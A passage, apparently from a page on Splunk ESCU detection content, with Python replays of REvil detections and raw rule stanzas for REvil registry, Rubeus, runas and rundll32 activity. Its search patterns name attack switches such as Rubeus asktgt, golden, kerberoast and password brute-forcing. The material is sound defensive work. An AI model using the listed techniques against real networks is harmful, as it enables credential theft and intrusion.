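def is_shadowstorage_resize(ev):
    """vssadmin.exe resizing shadow storage, launched from a shell or wmic.exe."""
    return (ev["parent_process_name"].lower() in SHADOWSTORAGE_PARENTS
            and ev["process_name"].lower() == "vssadmin.exe"
            and all(spl_wildcard(p).match(ev["process"]) for p in SHADOWSTORAGE_PATTERNS))


def is_revil_parameter(ev):
    """Any REvil-style switch, regardless of process name (hence the FP exposure)."""
    return any(spl_wildcard(p).match(ev["process"]) for p in REVIL_PATTERNS)


def run_detection(events, predicate):
    """Equivalent of '| tstats count ... by dest user process_name process'."""
    counts = Counter()
    for ev in events:
        if predicate(ev):
            counts[(ev["dest"], ev["user"], ev["process_name"], ev["process"])] += 1
    return counts


if __name__ == "__main__":
    for name, rule in (("resize_shadowstorage", is_shadowstorage_resize),
                       ("revil_exec_parameter", is_revil_parameter)):
        for key, count in run_detection(EVENTS, rule).items():
            print(name, count, *key)
```

The backup.exe row fires on "* -full *" exactly as the known_false_positives field warns, which is why the filter macro at the end of the search exists; the payload.exe row is caught only by "-nolan", because "-fast" with nothing after it does not satisfy the trailing space in the literal.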
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious registry modification that malware uses to store data about its infection. This technique is seen in several APT implants, malware families and ransomware such as REvil, which stores information like the randomly generated extension appended to every encrypted file and the file name of the ransom note on the compromised host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process, as well as registry modification events that carry the same process GUID. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` and `Registry` nodes of the `Endpoint` data model, because the search joins the two on `process_guid`. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Revil Registry Entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = A registry entry $registry_path$ with registry value $registry_value_name$ and data $registry_value_data$ related to REvil ransomware on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Revil Registry Entry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious registry modification that malware uses to store data about its infection. This technique is seen in several APT implants, malware families and ransomware such as REvil, which stores information like the randomly generated extension appended to every encrypted file and the file name of the ransom note on the compromised host.
action.notable.param.rule_title = Revil Registry Entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\SOFTWARE\\WOW6432Node\\Facebook_Assistant\\*" OR Registry.registry_path="*\\SOFTWARE\\WOW6432Node\\BlackLivesMatter*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `revil_registry_entry_filter` [ESCU - Rubeus Command Line Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project and Vincent Le Toux's MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc.
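The Revil Registry Entry search above differs from the process-only detections around it: it correlates two data model nodes, joining Endpoint.Registry rows onto Endpoint.Processes rows on process_guid and keeping only rows whose registry_value_data is not null. The Python below is an added example written for this page, not ESCU code; the process and registry rows, the GUIDs, the value names and the file name evil.exe are constructed for illustration, while the two registry path literals are taken from the search.

```python
"""Added example (not ESCU code): reproduces the 'Revil Registry Entry' logic,
an inner join of Endpoint.Registry onto Endpoint.Processes on process_guid,
restricted to the REvil registry paths, then '| where isnotnull(registry_value_data)'.
All rows below are constructed."""
import re

# Path literals copied from the search (single backslashes once conf escaping is removed).
REVIL_REGISTRY_PATHS = [
    r"*\SOFTWARE\WOW6432Node\Facebook_Assistant\*",
    r"*\SOFTWARE\WOW6432Node\BlackLivesMatter*",
]
OUTPUT_FIELDS = ["firstTime", "lastTime", "dest", "user", "parent_process_name",
                 "parent_process", "process_name", "process_path", "process",
                 "registry_key_name", "registry_path", "registry_value_name",
                 "registry_value_data", "process_guid"]

# Constructed GUIDs.
EVIL_GUID = "{7c0f8d2e-0000-4000-8000-000000000001}"
SVCHOST_GUID = "{7c0f8d2e-0000-4000-8000-000000000002}"
ORPHAN_GUID = "{7c0f8d2e-0000-4000-8000-000000000003}"   # registry rows with no process row

PROCESSES = [
    {"_time": 1713348000, "dest": "ws01", "user": "CORP\\bob", "process_id": 5124,
     "process_name": "evil.exe", "process": r"C:\Users\bob\AppData\Local\Temp\evil.exe",
     "process_path": r"C:\Users\bob\AppData\Local\Temp\evil.exe",
     "parent_process_name": "explorer.exe", "parent_process": "explorer.exe",
     "process_guid": EVIL_GUID},
    {"_time": 1713348060, "dest": "ws01", "user": "NT AUTHORITY\\SYSTEM", "process_id": 912,
     "process_name": "svchost.exe", "process": "svchost.exe -k netsvcs",
     "process_path": r"C:\Windows\System32\svchost.exe",
     "parent_process_name": "services.exe", "parent_process": "services.exe",
     "process_guid": SVCHOST_GUID},
]


def registry_row(path, name, data, guid):
    """Constructed Endpoint.Registry row; registry_key_name is the path minus the value."""
    return {"registry_path": path, "registry_key_name": path.rsplit("\\", 1)[0],
            "registry_value_name": name, "registry_value_data": data, "process_guid": guid}


REGISTRY = [
    registry_row(r"HKLM\SOFTWARE\WOW6432Node\BlackLivesMatter\ext", "ext", ".a1b2c3", EVIL_GUID),
    registry_row(r"HKLM\SOFTWARE\WOW6432Node\BlackLivesMatter\note", "note", "a1b2c3-readme.txt", EVIL_GUID),
    registry_row(r"HKLM\SOFTWARE\WOW6432Node\BlackLivesMatter\stat", "stat", None, EVIL_GUID),  # no data
    registry_row(r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Updater",
                 "Updater", "updater.exe", SVCHOST_GUID),                                       # unrelated path
    registry_row(r"HKLM\SOFTWARE\WOW6432Node\Facebook_Assistant\rnd", "rnd", "deadbeef", ORPHAN_GUID),
]


def spl_wildcard(pattern):
    """SPL wildcard literal to case-insensitive regex; '*' matches any run."""
    return re.compile("^" + ".*".join(map(re.escape, pattern.split("*"))) + "$", re.IGNORECASE)


def revil_registry_entries(processes, registry, max_matches=1):
    """Inner join on process_guid, mirroring '| join process_guid [ ... ]'.
    max_matches mirrors Splunk's join 'max' argument (default 1; 0 means unlimited):
    only that many registry rows per GUID are joined, before the isnotnull filter.
    firstTime/lastTime come from the process side, as in the search."""
    patterns = [spl_wildcard(p) for p in REVIL_REGISTRY_PATHS]
    by_guid = {}
    for reg in registry:
        if any(p.match(reg["registry_path"]) for p in patterns):
            by_guid.setdefault(reg["process_guid"], []).append(reg)
    rows = []
    for proc in processes:
        matched = by_guid.get(proc["process_guid"], [])
        if max_matches > 0:
            matched = matched[:max_matches]
        for reg in matched:
            if reg["registry_value_data"] is None:      # '| where isnotnull(registry_value_data)'
                continue
            merged = {**proc, **reg, "firstTime": proc["_time"], "lastTime": proc["_time"]}
            rows.append({f: merged.get(f) for f in OUTPUT_FIELDS})
    return rows


if __name__ == "__main__":
    for row in revil_registry_entries(PROCESSES, REGISTRY, max_matches=0):
        print(row["dest"], row["process_name"], row["registry_path"], row["registry_value_data"])
```

The orphan Facebook_Assistant row is dropped because there is no process row to join it to, and the svchost.exe row is dropped because its path is outside the two literals. The default of one joined row per GUID is worth checking in production: Splunk's join keeps a single subsearch row per key unless max is raised, so a process that writes several values under these keys surfaces as one notable, and which value it shows depends on subsearch ordering. The subsearch also runs under Splunk's join subsearch result and time limits, so in a busy environment confirm the registry side is not being truncated.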
Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003", "T1558", "T1558.003", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project and Vincent Le Toux's MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc. Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, legitimate applications may use the same command line parameters as Rubeus. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Rubeus Command Line Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "CISA AA23-347A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Rubeus command line parameters were used on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rubeus Command Line Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003", "T1558", "T1558.003", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpy's Kekeo project and Vincent Le Toux's MakeMeEnterpriseAdmin project. This analytic looks for the use of Rubeus command line arguments utilized in common Kerberos attacks like exporting and importing tickets, forging silver and golden tickets, requesting a TGT or TGS, kerberoasting, password spraying, etc. Red teams and adversaries alike use Rubeus for Kerberos attacks within Active Directory networks. Defenders should be aware that adversaries may customize the source code of Rubeus and modify the command line parameters. This would effectively bypass this analytic. action.notable.param.rule_title = Rubeus Command Line Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*ptt /ticket*" OR Processes.process = "* monitor /interval*" OR Processes.process ="* asktgt* /user:*" OR Processes.process ="* asktgs* /service:*" OR Processes.process ="* golden* /user:*" OR Processes.process ="* silver* /service:*" OR Processes.process ="* kerberoast*" OR Processes.process ="* asreproast*" OR Processes.process = "* renew* /ticket:*" OR Processes.process = "* brute* /password:*" OR Processes.process = "* brute* /passwords:*" OR Processes.process ="* harvest*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rubeus_command_line_parameters_filter` [ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule]
action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for a process accessing the winlogon.exe system process. The Splunk Threat Research Team identified this behavior when using the Rubeus tool to monitor for and export Kerberos tickets from memory. Before it can export tickets, Rubeus attempts to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe, and only then monitors for Kerberos tickets. Exporting tickets from memory is typically the first step of a pass-the-ticket attack. Red teams and adversaries alike may use the pass-the-ticket technique with stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic looks for a process accessing the winlogon.exe system process. The Splunk Threat Research Team identified this behavior when using the Rubeus tool to monitor for and export Kerberos tickets from memory. Before it can export tickets, Rubeus attempts to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe, and only then monitors for Kerberos tickets. Exporting tickets from memory is typically the first step of a pass-the-ticket attack. Red teams and adversaries alike may use the pass-the-ticket technique with stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.escu.how_to_implement = This search needs Sysmon logs and a Sysmon configuration that includes EventCode 10. This search uses an input macro named `sysmon`.
We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. action.escu.known_false_positives = Legitimate applications may obtain a handle for winlogon.exe. Filter as needed action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Winlogon.exe was accessed by $SourceImage$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rubeus Kerberos Ticket Exports Through Winlogon Access - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for a process accessing the winlogon.exe system process. 
The Splunk Threat Research team identified this behavior when using the Rubeus tool to monitor for and export kerberos tickets from memory. Before being able to export tickets. Rubeus will try to escalate privileges to SYSTEM by obtaining a handle to winlogon.exe before trying to monitor for kerberos tickets. Exporting tickets from memory is typically the first step for pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Rubeus to potentially bypass this analytic. action.notable.param.rule_title = Rubeus Kerberos Ticket Exports Through Winlogon Access action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage=C:\\Windows\\system32\\winlogon.exe (GrantedAccess=0x1f3fff) (SourceImage!=C:\\Windows\\system32\\svchost.exe AND SourceImage!=C:\\Windows\\system32\\lsass.exe AND SourceImage!=C:\\Windows\\system32\\LogonUI.exe AND SourceImage!=C:\\Windows\\system32\\smss.exe AND SourceImage!=C:\\Windows\\system32\\wbem\\wmiprvse.exe) | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `rubeus_kerberos_ticket_exports_through_winlogon_access_filter` [ESCU - Runas Execution in CommandLine - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic look for a spawned runas.exe process with a administrator user option parameter. 
This parameter was abused by adversaries, malware author or even red teams to gain elevated privileges in target host. This is a good hunting query to figure out privilege escalation tactics that may used for different stages like lateral movement but take note that administrator may use this command in purpose so its better to see other event context before and after this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic look for a spawned runas.exe process with a administrator user option parameter. This parameter was abused by adversaries, malware author or even red teams to gain elevated privileges in target host. This is a good hunting query to figure out privilege escalation tactics that may used for different stages like lateral movement but take note that administrator may use this command in purpose so its better to see other event context before and after this analytic. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated or manual execute this command that may generate false positives. filter is needed. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Runas Execution in CommandLine - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Runas Execution in CommandLine - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_runas` AND Processes.process = "*/user:*" AND Processes.process = "*admin*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `runas_execution_in_commandline_filter` [ESCU - Rundll32 Control RunDLL Hunt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting detection identifies rundll32.exe with `control_rundll` within the 
command-line, loading a .cpl or another file type. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. \ This is written to be a bit more broad by not including .cpl. \ During triage, review parallel processes to identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. \ This is written to be a bit more broad by not including .cpl. \ During triage, review parallel processes to identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = This is a hunting detection, meant to provide a understanding of how voluminous control_rundll is within the environment. action.escu.creation_date = 2021-09-08 action.escu.modification_date = 2021-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Control RunDLL Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Control RunDLL Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-40444"], "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `rundll32_control_rundll_hunt_filter` [ESCU - Rundll32 Control RunDLL World Writable Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This may be tuned, or a new one related, by adding .cpl to command-line. However, it's important to look for both. Tune/filter as needed. action.escu.creation_date = 2021-09-08 action.escu.modification_date = 2021-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Control RunDLL World Writable Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a suspicious file from disk. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Control RunDLL World Writable Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies rundll32.exe with `control_rundll` within the command-line, loading a .cpl or another file type from windows\temp, programdata, or appdata. Developed in relation to CVE-2021-40444. Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. This is written to be a bit more broad by not including .cpl. The paths are specified, add more as needed. During triage, review parallel processes to identify any further suspicious behavior. 
action.notable.param.rule_title = Rundll32 Control RunDLL World Writable Directory action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL* AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_control_rundll_world_writable_directory_filter` [ESCU - Rundll32 Create Remote Thread To A Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe to any process. This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the 